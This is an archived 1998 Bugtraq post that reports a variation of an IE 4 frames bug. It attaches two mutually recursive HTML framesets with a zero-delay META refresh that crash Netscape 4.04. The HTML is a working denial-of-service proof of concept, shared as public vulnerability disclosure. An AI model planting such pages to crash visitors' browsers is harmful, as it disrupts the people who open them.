[6416] in bugtraq
Re: IE 4 Bug (Crash with frames), Variation
daemon@ATHENA.MIT.EDU (whiz)
Mon Mar 30 15:55:42 1998
Date: Sat, 28 Mar 1998 22:14:22 -0500
Reply-To: whiz <whizpig@TIR.COM>
From: whiz <whizpig@TIR.COM>
To: BUGTRAQ@NETSPACE.ORG
--=====================_891159262==_
Content-Type: text/plain; charset="us-ascii"
Heres a variation of the IE 4 Bug. It crashes Netscape 4.04 pretty fast.
The most important part is <META HTTP-EQUIV="REFRESH" CONTENT="0;
URL=test.htm"> in test2.htm. Without this Netscape won't crash, but just
load 4 frames.
--=====================_891159262==_
Content-Type: text/html; charset="us-ascii"
Content-Disposition: attachment; filename="test.htm"
<HTML>
<HEAD>
<TITLE>Netscape 4.04 bug</TITLE>
</HEAD>
<FRAMESET ROWS="*,*" border=1>
<frame SRC="test2.htm">
<frame SRC="test2.htm">
</FRAMESET>
<BODY>
</BODY>
</HTML>
--=====================_891159262==_
Content-Type: text/html; charset="us-ascii"
Content-Disposition: attachment; filename="test2.htm"
<HTML>
<HEAD>
<TITLE>Netscape 4.04 bug</TITLE>
<META HTTP-EQUIV="REFRESH" CONTENT="0; URL=test.htm">
</HEAD>
<FRAMESET ROWS="*,*" border=1>
<frame SRC="test.htm">
<frame SRC="test.htm">
</FRAMESET>
<BODY>
test
</BODY>
</HTML>
--=====================_891159262==_
Content-Type: text/plain; charset="us-ascii"
--=====================_891159262==_--